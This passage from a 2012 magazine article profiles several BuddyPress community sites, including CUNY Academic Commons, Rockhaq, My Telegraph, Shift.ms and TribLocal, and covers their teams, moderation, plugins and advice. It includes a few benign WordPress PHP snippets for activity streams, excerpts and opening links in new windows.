There are some challenges to face. For example, CUNY uses MediaWiki for the wiki section of the website. The team managed to create a single sign-on for WordPress and MediaWiki, but managing the link between them — in terms of theming consistently, supporting different interfaces for user input, sharing log-ins and consolidating activity — has been an ongoing challenge.

The biggest challenge, however, has been resources. Boone has this to say:

Our team has a lot of great ideas about how to improve our site and BuddyPress itself, but it’s hard to put all these ideas into motion. Our development team has perhaps more BuddyPress-specific development talent than any other dev team out there — but we still don’t have enough developers with BuddyPress knowledge. (Hint hint: WordPress professionals who are looking for clients would do well to learn BuddyPress. There’s lots of work to be done.)

Customizations and Plugins

CUNY members’ Directory
The CUNY members’ directory

The CUNY Commons team and members of the Commons have developed and co-developed dozens of plugins, many of which are publicly available in WordPress’ plugins repository.

Notable examples include:

CUNY's Plugins
CUNY regularly releases custom plugins.

Some Commons customizations have been integrated into BuddyPress and WordPress. For example, the profile visibility features in BuddyPress 1.6 were built for the Commons, while the AJAX autosuggest for adding users to blogs in WordPress 3.4 is based on one of its patches.

Smaller pieces of functionality have been published by the team on its development blog.

In terms of plugins, the most important ones for CUNY Commons are these:

  • BuddyPress Docs
    This lets users collaborate on writing important documents without resorting to third-party solutions like Google Docs. It provides full version history using WordPress’ post revisions, and it integrates fully with BuddyPress’ activity streams.
  • BuddyPress Group Email Subscription
    This lets group members subscribe to email notifications with fine-grained control. Users can have different subscription settings for each group, ranging from immediate notification of each piece of group activity, all the way down to weekly digests summarizing important activity in all your groups.

Advice

Boone has this piece of advice for people starting out with their own BuddyPress community:

Think outside the BuddyPress box. Out of the box, BuddyPress is a great system, but it doesn’t (and can’t) meet all the needs of every community. So, before you start, you should have a sense of how you want your community members to engage with each other, and then think about the ways in which the software can help them do so. In contrast, don’t let BuddyPress’ default settings dictate the way you set up your community site — BuddyPress’ inherent flexibility and customizability mean that you don’t have to settle for what you get when you first download the software.

Free Pass

I asked each of my interviewees what they would integrate into BuddyPress’ core if they had one free pass. The Commons is in the lucky position of having a lead developer who is one of the core committers to BuddyPress. With respect to CUNY Academic Commons, BuddyPress doesn’t need many more user-facing features, but it does need under-the-hood improvements to make it easier to extend and customize. This has been happening throughout the 1.5 and 1.6 development cycles, which have seen improvements to performance and scaling, as well as additional developer APIs for easy hooking into BuddyPress’ core frameworks. As BuddyPress’ core becomes more stable and lean, the team at CUNY will be able to build even more custom plugins and functionality, which can be used in the Commons and disseminated to the wider community.

The Pilot: Rockhaq

Current membership: 50

Rockhaq

Rockhaq is a music journalism community for schools and colleges. It has just finished a limited pilot and is on the verge of rolling out to other schools in the UK. Its aim is to motivate students to write music reviews, with a view to increasing student engagement and improving literacy skills. The top students in the community have been rewarded with live music missions, and Rockhaq has given away tickets for acts such as Blink 182 and Nicki Minaj and provided interview opportunities with bands that students have wanted to speak with. According to Michelle Dhillon, Rockhaq “merges the virtual and real-life worlds together to create a dynamic uber-social journalism network.”

Chuffed to see @takeabow30 started writing his Blink 182 review straight after last night’s show in Notts. Watch out for it on site soon :)

@rockhaq

@michelledhillon @rockhaq THANKYOU, THANKYOU ONCE AGAIN. You have fulfilled a lifetime dream that will resonate with me for years to come.

@takeabow30

Who Is Behind It?

The brain behind Rockhaq is Michelle Dhillon, a professional journalist and editor. She singlehandedly oversees all community and editorial aspects, including providing lectures and tips on improving writing skills, choosing the top five weekly reviews and the review of the week, and liaising with community members both on and off site.

In addition to Michelle, a team of three Web developers have helped to build and design the community platform and provide support. Michelle is looking to extend Rockhaq into teaching live music photography, so she has enlisted the help of music photographer and teacher Phil Swift.

Why BuddyPress?

Rockhaq User's Profile Showing Achievements
Rockhaq members can unlock achievements that appear in their profile.

I asked Michelle why she chose BuddyPress over other platforms:

I was always going to use the WordPress platform; that was a given. I love this solution because it’s so flexible and puts a lot of power into the hands of the end user to be able to change and adapt the features they want really easily. BuddyPress wasn’t always in my plans, but I always intended to use a gaming plugin, and I was really impressed with Paul Gibbs’ Achievements plugin. This was my main reason for choosing BuddyPress, and I’m so glad I did because it’s a really nifty community package.

Michelle’s primary reason for using BuddyPress was the Achievements plugin, but she also likes that BuddyPress allows you to turn certain social-networking elements off very quickly. This has been a significant help, especially for running a pilot in which the environment needs to be as controlled as possible.

Rockhaq was built by Tammie Lister on a customized version of the BuddyPress default theme. It makes use of music photographer Phil Swift’s photos from live gigs of acts such as The Ting Tings, The Hives, Justice and Kasabian. This gives the platform its own unique online identity. As Michelle says, “The work here has been done so cleverly and intelligently — it looks and feels fantastic, and most importantly, it is us.”

Because it is still being piloted, Michelle hasn’t had to do any major customizations. It is important that the features be simple and uncomplicated because the developers want to test the basics of the platform thoroughly. The only alteration they have made is to remove status updates from BuddyPress’ core.

Challenges

Rockhaq Activity Stream
The activity stream is moderated but still fun and interactive.

A very real issue that Michelle has had to tackle is cyber-bullying. This is a big concern in educational environments that use social networking, so Michelle has had to assure teachers and schools that the community is safe and regulated for students. Thus, it needs to be moderated, or at least be closely observed. At the same time, it needs to be fun and allow for interaction, so comments and public messages are permitted.

So far, Rockhaq hasn’t faced any major problems, besides a few members posting immature comments, which were moderated and quickly removed. Part of the ethos behind Rockhaq is “educating young people about how to use social networks in a positive and fruitful way, rather than foster and perpetuate negative behavior that has been generated by unregulated or poorly regulated social networks like Facebook.”

Plugins

  • Achievements
    This has been and continues to be the most important plugin for Rockhaq. It is invaluable in keeping the students motivated.
  • Gravity Forms
    This works for Rockhaq because it is usable and flexible. Michelle uses it for contact forms and mailing list queries and to help users spread the word.
  • Twitter Widget Pro
    Some Twitter plugins don’t work well or refresh properly, but this one does. Twitter is hugely important to Rockhaq because it enables students to stay in touch with what’s going on. The Twitter feed is even more important than Facebook.

Advice

I asked Michelle what advice she would give to someone starting their own BuddyPress community:

Be prepared — for anything! That includes positive as well as negative incidents. We’ve been very excited as ours have been overwhelmingly positive, but you still have to be prepared for users logging on at all hours, adding much more work than you’d anticipated and being obsessed with your community. Also, be prepared to publicize it — we’ve been featured in major local media already, and I didn’t expect that either. You will be working all hours!

Free Pass

Michelle seemed excited by the thought of adding a feature to BuddyPress’ core. “I’m like a kid in a sweet shop when it comes to plugins, and one is never enough,” she says. “However, if you had to ask me, then I would be very biased and say a group blogging feature. This seems to make sense for a social networking plugin that uses WordPress, the mother of all open-source blog networks!”

The Newspaper: My Telegraph

My Telegraph

Current membership: 130,000 active users; 3000 who blog regularly; 5000 – 10,000 daily commenters on The Telegraph

My Telegraph was started in 2006 to provide an online home for readers of British daily newspaper The Telegraph. The team at The Telegraph recognized that people were reading news on all sorts of websites, but that their most loyal readers identified themselves with The Telegraph and valued discussion with like-minded people. The first version of the website was designed so that people could blog in three clicks, but over the years they added more sophisticated functionality, such as profiles and groups, so they moved to BuddyPress.

Who Is Behind It?

My Telegraph has a dedicated developer, core BuddyPress developer Paul Gibbs, and a community manager, Kate Day, both of whom spoke to me for this article. In addition, specialist editorial teams run specific groups. For example, the Books desk looks after the Short Story Club. And a team of moderators monitor all user-generated content on My Telegraph, as well as on the main Telegraph website.

Why BuddyPress?

While various out-of-the-box solutions exist, BuddyPress is the most advanced in functionality. Another important factor in the team’s decision was that BuddyPress has a community of developers that actively enhance the platform and come up with ideas that the folks at The Telegraph might not come up with. A fringe benefit is that, while blogging takes more than three clicks, many people are familiar with WordPress’ user experience.

By implementing BuddyPress, My Telegraph has been able to scale beyond a blogging platform to a platform for general engagement.

How It Works

Telegraph’s Short Story Group
Moderators, journalists and even a novelist take care of the different groups.

With a community on that scale, I wanted to know what approach the team takes to moderation. Here’s what Kate has to say:

We try to take a light touch to moderation. My Telegraph is very much our readers’ space — journalists set the agenda elsewhere on our website! Nothing is screened before it goes live, and moderators simply work through a queue of flags that are generated when readers click on the “Report” buttons. Some of the groups are slightly more structured, with journalists, freelancers and, in one case, a novelist, leading the conversations via a group blog.

Moderation is the biggest challenge the team faces. The team needs to find the right balance between allowing people to enjoy a free-flowing conversation while preventing things from turning nasty. Spam is another issue — My Telegraph ranks high on Google and is a magnet for spammers.

Plugins

Like CUNY Commons, My Telegraph has its own WordPress.org profile page. So far, the team has released the Expire User Passwords plugin, which forces users to change their passwords every 30 days. Paul often looks for things that would be of use to other websites to open source. He plans to release more soon.

My Telegraph runs a lot of bespoke plugins and tweaks, such as the Group Competition plugin and the upcoming Bookshelf feature. Its most useful third-party plugin is BP Group Blogs, which ties together blogs and groups. Unfortunately for Paul, the plugin is quite old and can cause problems when the website is updated.

Advice

Both Paul and Kate had advice for people starting a BuddyPress community.

Here’s Kate’s take, from the community manager’s perspective:

Communities are like gardens. They take time to grow, and they need some care and attention. Don’t expect results straight away, but when relationships start growing between members of your community, the results are fantastic and constantly surprising. We’ve had members create a collaborative eBook, meet up for coffee mornings, even go on holiday together! And I hope a great many more people have enjoyed some really interesting discussions.

And Paul, from the developer’s perspective:

Start small. Launch early with a small piece of your intended functionality, and grow your community as you grow your site. Otherwise, it’s very easy to end up with so much “stuff” on the site that new users aren’t sure what they should be doing.

And make sure you have someone on the site participating with your community regularly and talking to them. You need to encourage your community to grow, as it won’t if it’s left alone by itself.

Free Pass

Paul, like Boone, is a BuddyPress core developer, so he always gives input into which features to integrate in BuddyPress’ core. However, for The Telegraph he would like to add a group management screen to the WordPress admin area. This would be similar to the activity management screen that appeared in BuddyPress 1.6. Dealing with users in groups is something that My Telegraph does a lot. Luckily for Paul, BuddyPress 1.7 will have exactly that.

The Non-Profit: Shift.ms

Shift.ms

Current membership: 3631

Shift.ms is an online social support network for people with multiple sclerosis (MS). Over 2.5 million people (“MSers”) worldwide have this chronic neurological condition. People are most commonly diagnosed with MS in their 20s and 30s. Shift.ms founder George Pepper was diagnosed when he was 22, and at the time he found it difficult to find people his own age who were having a similar experience.

MS is progressive, so newly diagnosed MSers have different needs than those who have been living with it for many years. In 2007, George set up Shift.ms as a peer support network for young MSers.

Who Is Behind It?

Shift.ms is a community-led organization, and all of its members provide the content and decide on its direction. It has two ongoing employees, George himself and a community coordinator, Beki. BuddyPress designer and developer Tammie Lister is responsible for the design and development of the website, and WP Valet takes care of ongoing support and hosting.

Why BuddyPress?

I asked the team members why they chose BuddyPress over other solutions. For them, the strength of BuddyPress lay in the thriving community around it. In addition, a lot of plugins existed, which meant they could extend BuddyPress on a tiny budget.

Shift.ms already had an online magazine that was built using WordPress, so using BuddyPress enabled it to easily integrate its community with that. The particular advantage for Shift.ms, however, was that members could create and update their own profiles.

A screenshot of the Shift.ms activity stream
Much of the activity takes place in the forum.

Community members hang out mainly in the forum, where they can ask questions about living with the condition that they might not want to ask a health professional or a loved one. While all of the comments are read by George and Beki, moderating them is not usually necessary because the community is good at self-moderation and spots any occasional spam accounts that slip under the radar.

The theme itself is a custom child theme of the BuddyPress default. It has had heavy customization and uses several different custom post types. However, the main challenge has been finding a balance between the expected behavior of the community and what BuddyPress and WordPress can do; these things aren’t always in harmony.

Snippets

I asked Shift.ms if it had any code snippets to share. The one below was written by BuddyPress core developer Paul Gibbs. The team needed to solve an issue in which an external company had provided a video template as a page. Shift.ms wanted the page comments to appear in the stream (they usually don’t).

// Tell BuddyPress to record comments on pages as well as posts in the
// activity stream; by default only comments on the 'post' type are recorded.
function shiftms_addpagecomments() {
    return array( 'page', 'post' );
}
add_filter( 'bp_blogs_record_comment_post_types', 'shiftms_addpagecomments' );

Shift.ms needs a range of excerpt sizes, and this snippet lets them achieve that:

// Trim $string to at most $word_limit words.
function shiftms_string_limit_words( $string, $word_limit ) {
    // Split into at most $word_limit + 1 pieces; the last piece holds the remainder.
    $words = explode( ' ', $string, ( $word_limit + 1 ) );
    if ( count( $words ) > $word_limit ) {
        array_pop( $words ); // drop the remainder
    }
    return implode( ' ', $words );
}

This function is called using:

<?php
$excerpt = get_the_excerpt();
echo shiftms_string_limit_words( $excerpt, 20 );
?>

In some places, opening links in a new window is necessary:

// Add target="_blank" to every link, then undo it for links back to shift.ms
// and for in-page (#) anchors. This is plain string replacement, so it only
// matches links written as <a href="..."> with href as the first attribute.
function shiftms_openlinks( $text ) {
    $return = str_replace( '<a href="', '<a target="_blank" href="', $text );
    $return = str_replace( '<a target="_blank" href="http://shift.ms', '<a href="http://shift.ms', $return );
    $return = str_replace( '<a target="_blank" href="#', '<a href="#', $return );
    // Remove the duplicate target left behind when a link already carried target="_blank".
    $return = str_replace( ' target="_blank">', '>', $return );
    return $return;
}
add_filter( 'the_content', 'shiftms_openlinks' );
add_filter( 'comment_text', 'shiftms_openlinks' );
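As an added example (not Shift.ms’s or Paul Gibbs’s code), the same filter rebuilt on DOMDocument: it matches links however their attributes are ordered or spaced, leaves same-site and in-page links alone, and adds rel="noopener noreferrer" to every link it opens in a new window so the opened page cannot reach the opener window. The function name and the $site_host default are assumptions.

```php
<?php
// Added example: DOM-based replacement for the str_replace() link filter.
// Assumed helper name and site host; adjust $site_host for your own install.
function shiftms_openlinks_dom( $text, $site_host = 'shift.ms' ) {
    if ( false === stripos( $text, '<a' ) ) {
        return $text; // nothing to rewrite
    }

    $dom  = new DOMDocument();
    $prev = libxml_use_internal_errors( true ); // tolerate sloppy user HTML
    // Wrap the fragment so we can unwrap it again; the XML prologue tells
    // libxml the input is UTF-8. NOIMPLIED/NODEFDTD keep html/body/doctype out.
    $dom->loadHTML(
        '<?xml encoding="utf-8" ?><div>' . $text . '</div>',
        LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD
    );
    libxml_clear_errors();
    libxml_use_internal_errors( $prev );

    foreach ( $dom->getElementsByTagName( 'a' ) as $a ) {
        $href = trim( $a->getAttribute( 'href' ) );
        if ( '' === $href || '#' === $href[0] ) {
            continue; // empty or in-page anchor: stay in the same window
        }
        $host = parse_url( $href, PHP_URL_HOST );
        if ( empty( $host ) ) {
            continue; // relative URL (or unparsable): treat as internal
        }
        if ( 0 === strcasecmp( $host, $site_host )
            || 0 === strcasecmp( $host, 'www.' . $site_host ) ) {
            continue; // link back to our own site
        }

        $a->setAttribute( 'target', '_blank' );
        // Merge with any rel the author already set (e.g. "nofollow") and
        // add noopener/noreferrer so the new window cannot use window.opener.
        $rel = preg_split( '/\s+/', $a->getAttribute( 'rel' ), -1, PREG_SPLIT_NO_EMPTY );
        $rel = array_unique( array_merge( $rel, array( 'noopener', 'noreferrer' ) ) );
        $a->setAttribute( 'rel', implode( ' ', $rel ) );
    }

    // Unwrap our <div> (it is the first div in document order) and return inner HTML.
    $wrapper = $dom->getElementsByTagName( 'div' )->item( 0 );
    $out     = '';
    foreach ( $wrapper->childNodes as $child ) {
        $out .= $dom->saveHTML( $child );
    }
    return $out;
}
add_filter( 'the_content', 'shiftms_openlinks_dom' );
add_filter( 'comment_text', 'shiftms_openlinks_dom' );
```

Because comment_text carries user-submitted markup, parsing it with a real HTML parser rather than string matching also means a link with unusual attribute spacing cannot slip past the rewrite.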

In addition to BuddyPress, Shift.ms finds Gravity Forms useful because it lets non-technical team members have control of forms.

Advice

I asked Shift.ms if it has any advice for someone starting a BuddyPress community. Here’s what it had to say:

BuddyPress developers are few and far between at the moment, but their number is growing fast. I’d say get someone in who has specific BuddyPress experience; WordPress knowledge is fantastic, but there are a number of significant differences.

Free Pass

For users, George would like to see a map integrated into core so that he can show where all members reside. Developer Tammie Lister would like to see more privacy controls. She’d like to give users more control over what is publicly displayed, which would help them feel safer in these more personal communities.

The One that Got Away: TribLocal

TribLocal

Current membership: 100,000

TribLocal is designed to collect and deliver local news via 88 community websites covering the Chicago suburbs. I spoke to developer Tom Willmot, of Human Made, the development shop behind the website. Many of the visitors show up just to read headlines, check out the police blotter or click through the photo galleries of news and events in their neighborhood. More engaged users sign up for accounts to post their own stories and event listings, which the production staff moderate and consider for the home page. Like any blog, this one has comments, social-media sharing tools, RSS and member profiles. In addition to original reporting and community contributions, TribLocal has an aggregation strategy to highlight interesting local news elsewhere.

The Team

In addition to the development team that handles the technical side of things, the community is run by a team of community producers. The news team writes articles for the various local websites, moderates articles submitted by the local journalists and chooses the best ones for inclusion in the weekly newspaper.

Why BuddyPress?

The TribLocal websites were originally built with a custom solution. When Human Made came on board, the client had already decided to replace its existing solution with WordPress Multisite and BuddyPress. The key element that BuddyPress brought to the table was to put user log-ins and profiles on the front end. BuddyPress provides this out of the box.

How It Works

The community producers review content that is submitted via the website and decide whether to promote it on the home page of the website or run it in the following week’s newspaper via a reverse-publishing system. In addition, producers also monitor the website for things like terms-of-service issues.

Add An Event At TribLocal
Members can add events through the front end of the website.

Members can publish three post types:

  • Stories,
  • Photo galleries,
  • Calendar events.

Events have been the most popular. A home page calendar shows upcoming events, and users can download the ICS file.

TribLocal Events List
Members’ events appear on the home page.

Other features are:

  • A photo section to encourage users to post their photographs. Shots of severe weather in the Chicago area have been particularly popular.
  • A voting system for high school athlete of the month, local volunteer recognition and other initiatives.
  • Members becoming regular contributors, with some having their own official blogs covering areas of local interest.

I asked Tom how the members interact with each other:

As far as member-to-member interaction, we had @mentions, which I think are standard to BuddyPress. While we had open registration, member pages, etc., we didn’t activate the feature for people to friend/follow each other. So, in that sense, maybe it wasn’t a true “social network in a box,” but it was an innovative way to engage people in the news and really unlike anything else in local community journalism.

A key requirement was to have user-generated content. Users needed to be able to act as authors, with the ability to post news, photo galleries and events from the front end. This required extending BuddyPress’ user profiles beyond simply logging in and recreating something resembling WordPress’ back-end functionality for users.

Leaving BuddyPress

Human Made has had issues using BuddyPress, not because of any inherent problem in BuddyPress itself, but because it had more functionality than was needed. The client had preselected BuddyPress, so they were stuck with it. The development team only needed the user log-in and profile features, so a lot of features and associated code were superfluous to the project.

This meant that the website had some performance issues due to the number of queries generated by BuddyPress. The client’s internal system prevented them from using Memcached, so instead they used a combination of Varnish for full-page caching and flat HTML fragment caching for widgets and comments. The heavy customization of BuddyPress caused problems when it came time to upgrade the plugin: BuddyPress changed fundamentally between versions, and the team was unable to update to the latest version.

Advice

Tom has this advice for anyone starting a BuddyPress community:

We would advise them to start with BuddyPress at the outset. We had limitations because the client had already designed the site, which restricted how we were able to approach the development. Ideally, the theme and development would be built to work integrally with BuddyPress, rather than having to adapt existing concepts.

Free Pass

If Tom had one free pass, he’d love to see BuddyPress more closely follow WordPress’ core architecture and APIs.

Conclusion

If there’s one commonality among these successful BuddyPress installations, it’s the people behind them. From Michelle’s passion for music journalism and improving student literacy, to Kate’s desire for a community for Telegraph readers, to the CUNY ethos of providing a collaborative working space for staff and students, to George’s aim to provide support for MS sufferers, these communities were started by passionate people who wanted to create a forum for other passionate people to converse, to work towards a shared goal, or to share advice and support each other. The BuddyPress plugin is wonderful, but the personal passion is what really drives these communities.

Resources

If you’re thinking of starting a community and you’ve got the drive for it, check out some of these resources to help you get started with BuddyPress:

You could also take a trip to the first BuddyCamp, which is happening this October in Vancouver.

(al)


© Siobhan McKeown for Smashing Magazine, 2012.

